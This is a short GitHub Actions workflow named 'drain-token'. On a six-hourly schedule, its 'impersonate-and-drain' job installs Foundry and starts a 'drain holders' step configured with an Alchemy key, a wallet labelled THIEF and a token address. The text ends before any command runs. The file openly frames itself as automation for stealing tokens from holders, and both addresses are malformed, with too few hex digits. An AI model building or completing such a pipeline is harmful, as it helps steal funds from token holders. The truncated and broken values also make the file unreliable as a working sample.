name: drain-token

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  impersonate-and-drain:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: install foundry
        uses: foundry-rs/foundry-toolchain@v1

      - name: drain holders
        env:
          ALCHEMY_KEY: ${{ secrets.ALCHEMY_KEY }}
          THIEF: "0x9C1a73a6a3c6B8B482a2a1F6E6D819B578dC397"
          TOKEN: "0x8dCE83ECa4af"
